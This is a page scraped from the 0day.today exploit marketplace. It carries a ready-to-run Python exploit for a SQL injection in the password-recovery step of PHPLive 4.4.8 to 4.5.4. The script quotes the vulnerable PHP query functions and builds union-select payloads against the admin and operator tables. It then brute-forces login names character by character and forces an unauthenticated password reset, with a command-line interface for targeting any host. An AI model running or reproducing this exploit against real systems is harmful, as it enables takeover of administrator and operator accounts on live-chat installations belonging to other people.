0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHPLive 4.4.8 < 4.5.4 - Password Recovery SQL Injection
[#!/bin/env python
################################################################################################
# Exploit title: Password Recovery Sql Injection
# Exploit Author: Tiago Carvalho
# Vendor Homepage: http://www.phplivesupport.com/?plk=osicodes-5-ykq-m
# Version : 4.4.8 - 4.5.4
# Product Name: Phplive
# Tested on: Debian \ Kali linux 2016-1
################################################################################################
"""
Their are multiple sql injection vunlerabilities in this product.
The exploit uses the sql injection vulnerability on the last step of the password recovery process
and force the application to rest the password and show the username, without requiring authentication
or to ever execute the first step, the vulnerability allows the recovery of both admin and operator.
Vulnerable code location: API/Setup/get.php
The filtering in place allows alphanumeric and restricts the use of serveral special chars,
its use of mysql escape functions and stripslashes are bypassed by since theirs no need to inject
special char to create a valid statement.
FUNCTION Setup_get_InfoByID( &$dbh,
$adminid )
{
if ( $adminid == "" )
return false ;
LIST( $adminid ) = database_mysql_quote( $dbh, $adminid ) ;
$query = "SELECT * FROM p_admins WHERE adminID = $adminid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
Vulnerable code location: /API/Ops/get.php
FUNCTION Ops_get_OpInfoByID( &$dbh,
$opid )
{
if ( $opid == "" )
return false ;
LIST( $opid ) = database_mysql_quote( $dbh, $opid ) ;
$query = "SELECT * FROM p_operators WHERE opID = $opid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
"""
import re
import urllib2
import md5
import string
import argparse
match = re.compile(r"<div\sclass=\"edit_title\".*?>(.*)</div>", re.MULTILINE)
server_url = "localhost/phplive"
def build_payload(host, sql, search_exp, target, last_active, passwd):
req_url = "http://%s/index.php%s"
url_params = "?v=%s&%s=0+%s"
str = sql % (last_active, passwd, search_exp)
pwd_verify = md5.new("%d%d" % (last_active,passwd)).hexdigest()
url_params = url_params % (pwd_verify,target,str)
return req_url % (host, url_params)
def exploit(host, admin, last_active, passwd):
if admin:
target="adminid"
sql = "union+all+select+adminid,created,%d,status,ses,login,%d,email+from+p_admins+where+login+like+%s25"
else:
target="opid"
sql = "union+all+select+opid,%d,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,login,%d,0,0,0,0,0,0+from+p_operators+where+login+like+%s25"
char_list = list(string.ascii_letters)
for char in char_list:
payload = build_payload(host, sql, hex(ord(char)), target=target, last_active=last_active, passwd=passwd)
request = urllib2.urlopen(payload)
if request.code == 200:
html = request.read()
result = match.findall(html)
if len(result) == 2 and result[1]:
print "[*]\tSUCCESS!!!!!"
print "[*]\t%s %s" % (re.sub("<span.*?>|</span>","",result[0]), result[1])
break
# exploit(server_url, admin=False, last_active=1, passwd=1)
if __name__ == '__main__':
admin = True
parser = argparse.ArgumentParser(description='PhpLive 4.4.8 Password Recovery Sql injection Exploit')
parser.add_argument("-u", "--url", help="url host|ipaddress/path eg: localhost/phplive")
parser.add_argument("-o", "--operator", help="Execute operators password reset", action="store_true")
parser.add_argument("-l", "--lastactive", help="Last active date (int)", type=int, default=0)
parser.add_argument("-p", "--passwd", help="Password (int)", type=int, default=0)
args = parser.parse_args()
if args.operator:
print "[*]\toperator password reset"
admin = False
exploit(args.url, admin, args.lastactive, args.passwd)
# 0day.today [2024-11-16] #